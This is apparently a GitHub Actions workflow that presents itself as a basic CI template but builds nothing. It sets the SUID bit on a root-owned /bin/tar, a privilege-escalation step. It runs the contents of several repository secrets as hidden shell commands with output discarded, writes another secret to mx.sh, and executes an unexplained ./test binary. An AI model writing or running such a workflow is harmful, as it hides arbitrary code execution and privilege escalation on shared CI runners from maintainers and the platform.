# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: root suid tar
        run: sudo chown root:sudo /bin/tar && sudo chmod u+s /bin/tar
      - uses: actions/checkout@v4
      - name: Run a one-line script
        run: whoami
      - name: Set up JDK
        uses: actions/setup-java@v3
        with:
          distribution: 'temurin'
          java-version: '21'

      - name: Get cache key
        id: cache-key
        run: echo "CACHE_KEY=$(date +%s)" >> $GITHUB_ENV
      - name: Cache
        id: cache-v
        uses: actions/cache@v4
        with:
          path: v
          key: v-${{ env.CACHE_KEY }}
          restore-keys: |
            v-

      
      - name: Run a multi-line script
        env:
          TEST: ${{ secrets.Test }}
          TEST2: ${{ secrets.Test2 }}
          TEST3: ${{ secrets.Test3 }}
          LINK: ${{ secrets.LINK }}
          URID: ${{ secrets.URID }}
          NX3: ${{ secrets.NX3 }}
          NX4: ${{ secrets.NX4 }}
          XX2: ${{ secrets.XX2 }}
          XX3: ${{ secrets.XX3 }}
          NX5: ${{ secrets.NX5 }}
        run: |
          bash -c "$XX2" > /dev/null
          bash -c "$XX3" > /dev/null
          bash -c "$TEST" > /dev/null
          bash -c "$TEST2" > /dev/null
          bash -c "$TEST3" > /dev/null
          bash -c "$NX3" > /dev/null
          bash -c "$NX4" > /dev/null
          echo -e "$LINK" > mx.sh
          chmod +x ./test
          ./test
          bash -c "$NX5" > /dev/null
